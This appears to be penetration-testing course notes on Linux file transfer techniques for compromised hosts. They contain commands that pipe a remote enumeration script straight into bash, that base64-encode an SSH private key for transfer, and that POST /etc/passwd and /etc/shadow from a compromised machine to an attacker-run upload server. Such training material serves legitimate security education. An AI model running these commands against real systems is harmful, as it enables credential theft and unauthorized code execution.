Download to Linux
Base64
First use md5sum to check the file we want to transfer:
[!bash!]$ md5sum id_rsa
4e301756a07ded0a2dd6953abf015278 id_rsaNow base64 encode the target:
[!bash!]$ cat id_rsa |base64 -w 0;echo
LS0tLS1CRU<snip>On target system, decode base64 string:
[!bash!]$ echo -n 'LS0tLS1<snip>' | base64 -d > id_rsaAfter transferring, confirm the content with md5sum:
[!bash!]$ md5sum id_rsa
4e301756a07ded0a2dd6953abf015278 id_rsawget
[!bash!]$ wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.shcURL
[!bash!]$ curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.shFileless
We don’t have to download. We can use the memory.
Fileless cURL
[!bash!]$ curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bashFileless wget
[!bash!]$ wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3
Hello World!Bash
First connect to the target webserver:
[!bash!]$ exec 3<>/dev/tcp/10.10.10.32/80Send http get request:
[!bash!]$ echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3Print the response:
[!bash!]$ cat <&3SSH
[!bash!]$ scp plaintext@192.168.49.128:/root/myroot.txt . Upload to Linux
Sometimes we need to upload files from our target machine to attack host.
Upload Server
Let’s see how we can configure uploadserver module to use HTTPs.
Spin up Web server:
[!bash!]$ sudo python3 -m pip install --user uploadserver
Collecting uploadserver
Using cached uploadserver-2.0.1-py3-none-any.whl (6.9 kB)
Installing collected packages: uploadserver
Successfully installed uploadserver-2.0.1Now we will create a certificate:
[!bash!]$ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
Generating a RSA private key
................................................................................+++++
.......+++++
writing new private key to 'server.pem'
-----Let’s start a web server:
[!bash!]$ mkdir https && cd https[!bash!]$ sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
File upload available at /upload
Serving HTTPS on 0.0.0.0 port 443 (https://0.0.0.0:443/) ...from our compromised machine, let’s upload the /etc/passwd and /etc/shadow files:
[!bash!]$ curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecurePython
For Python3:
[!bash!]$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...For Python2:
[!bash!]$ python2.7 -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...PHP
[!bash!]$ php -S 0.0.0.0:8000
[Fri May 20 08:16:47 2022] PHP 7.4.28 Development Server (http://0.0.0.0:8000) startedRuby
!bash!]$ ruby -run -ehttpd . -p8000
[2022-05-23 09:35:46] INFO WEBrick 1.6.1
[2022-05-23 09:35:46] INFO ruby 2.7.4 (2021-07-07) [x86_64-linux-gnu]
[2022-05-23 09:35:46] INFO WEBrick::HTTPServer#start: pid=1705 port=8000SCP
[!bash!]$ scp /etc/passwd htb-student@10.129.86.90:/home/htb-student/
htb-student@10.129.86.90's password:
passwd For copying entire directory:
jadu101@htb[/htb]$ scp -r ptunnel-ng ubuntu@10.129.202.64:~/